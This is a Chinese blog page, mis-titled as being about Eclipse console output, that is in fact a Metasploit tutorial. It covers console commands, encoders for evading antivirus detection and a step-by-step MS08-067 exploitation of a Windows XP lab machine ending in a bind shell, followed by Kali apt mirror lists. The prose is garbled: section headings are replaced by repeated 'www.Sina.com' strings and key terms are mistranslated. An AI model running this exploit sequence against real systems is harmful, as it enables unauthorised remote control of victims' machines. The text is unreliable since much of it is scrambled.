首页 > 编程知识 正文

直接调出控制台的,eclipse控制台输出

时间:2023-05-06 03:13:25 阅读:34303 作者:4811

MSF控制台提供了集成的集中管理控制台。 MSF控制台提供对所有metasploit插件、payload、使用模块、开机自检模块等的访问和使用。 MSF控制台还提供了第三方程序接口,如nmap和sqlmap,可以直接在MSF控制台中使用。 启动MSF终端后,可以首先输入help命令以显示MSF终端支持的命令列表。 这包括核心命令集和后端数据库命令集。 对于这些命令中的大多数,可以输入help[COMMAND]以获取有关如何使用命令的帮助信息。

1 .键入MSF控制台打开

2 .然后输入search ms08-067查找漏洞

打开远程桌面协议

use参数

这是使用参数。 如果用于某个使用模块、payload等,请使用use参数

使用漏洞use的你选择的使用模块

Show参数

这个命令被使用了很多。 请一定要认真看。 简单输入show,即可显示所有payload、使用模块、post模块、插件等。 但是,一般来说我们不这么用。 要查看使用模块,请输入show exploits。 如果要显示支付,请输入显示支付。

显示可用的载荷显示支付

检查需要设置的选项show options。 是,空的是,我们需要设定。 在下图中,您可以看到尚未设置RHOST参数

Set参数

这主要是payload和其他模块的设置。 例如设定攻击目标的IP为set RHOST 192.168.0.2

然后输入exploit执行攻击,输入exit退出

3358 www.Sina.com/http://www.Sina.com /测试器用它攻击系统、程序或服务,得到开发者意想不到的结果。 常见的情况是内存溢出、网站程序漏洞利用和错误的exploit配置。 exploits总体上分为两种exploit攻击方法。 即主动溢出和被动溢出。 主动溢出是指主动攻击目标主机漏洞以获得控制权限,被动溢出是指被动监听目标主机以获得适当的操作。 Exploit共分为13种: ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows 其中windows下最多。 3358www.Sina.com/metasploit内置27种encode模块,可以对metasploit中的exploit进行编码(encode ),避免检测到防病毒软件例如,通用/非nonenormalthe ' none ' encodermipsbe/longxornormalxorencodermipsle/longxornormalxorencoderphp/base64 great PHP longxornormalppclongxorencoder http://www.Sina.com/reverse shell等希望被攻击系统运行的程序在目标计算机和测试器之间产生反响payload可以是能够仅在目标机器上执行限定的命令的程序。 通过3358 www.Sina.com/http://www.Sina.com /渗透攻击获取目标系统的远程控制权后,在受控系统上进行各种后渗透攻击动作,包括获取机密信息、进一步扩展和实施跳板攻击。 http://www.Sina.com/http://www.Sina.com /

Metasploit目前提供三种用户使用界面: GUI模式、控制台终端模式和命令行(CLI )模式。 msfcli与MSF控制台是同一命令行界面。

但是,他不提供交互式命令行模式,直接从命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,效率更高,更方便。 msfgui图形界面工具

只需单击鼠标并输入目标IP地址,即可使用Metasploit的强大功能渗透到目标系统中

。 

msfconsole模式最常用,启动方式:

输入msfconsole

运行此命令后将进入msf 命令提示符: 

msf>

2、获取命令的帮助信息:help

例子:help connect

3、Armitage :MSF 的一个图形接口

运行方式:armitage

常用exploit,payload设置参数

show exploit——显示Metasploit中所有渗透攻击模块show playload——查看所有活动状态的攻击载荷

攻击靶机并获取shell

       被攻击者IP地址:192.168.120.131,操作系统Windows XP sp3 

       攻击者IP地址:192.168.120.130

1.//查找ms08_067漏洞

msf > search ms08_067

     

2、//使用MS08_067漏洞
 use exploit/windows/smb/ms08_067_netapi

3、//设置远程地址,正向连接
set RHOST 192.168.120.131

4、//设置ShellCode
set payload windows/shell_bind_tcp

5、//显示配置的选项
 show options

6、//expliot攻击

    成功返回Shell

源:

deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib

 

deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free

 

deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里云kali源

 

deb http://mirrors.aliyun.com/kali sana main non-free contrib

 

deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib

deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot i386 LIVE/INSTALL Binary 20150811-09:06]/ sana contrib main non-free
deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib

 

deb http://mirrors.aliyun.com/kali kali main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali main non-free contrib
deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

 

deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。